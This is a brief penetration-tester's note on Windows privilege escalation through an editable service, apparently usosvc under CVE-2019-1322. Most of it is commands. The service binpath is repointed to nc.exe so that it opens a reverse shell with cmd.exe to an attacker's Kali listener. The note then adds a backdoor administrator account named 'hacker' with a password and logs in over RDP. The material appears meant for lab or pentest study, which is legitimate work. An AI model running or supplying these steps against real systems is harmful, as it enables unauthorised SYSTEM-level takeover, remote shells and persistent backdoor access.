Editable Service

If you find a service that is editable (WinPEAS can help here to find such services) you can edit the binpath to point to nc.exe to get a reverse shell.

Steps also described here: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc

Note: in both my experiences using this, this does get shell, but it closes in a few seconds.

1. Upload nc.exe to a writable directory.
2. sc config usosvc binpath= "C:\Inetpub\wwwroot\nc.exe -nv <kali_IP> 9988 -e C:\Windows\System32\cmd.exe"
3. sc config usosvc obj= ".\LocalSystem" password= ""
   • I didn't need this second time using it
4. sc config usosvc start= "demand"
5. nc -lvp 9988 (setup listener on kali)
6. net start usosvc
7. R00T!

Since shell closes soon, add new admin user:

1. net user hacker h@ck3r%93 /add
2. net localgroup administrators hacker /add

Now RDP/ssh with new creds (if services are available, or you can open them yourself):

1. rdesktop <target>
2. R00T!

The shell closes due to a Windows timeout variable in the registry that defines how long to wait for a service to response. If you're in a position to edit that (i.e. ssh/rdp not enabled) this would stabilize the shell. If you don’t want to edit the registry, since you're admin for a bit with this shell, you could try enabling RDP or SSH.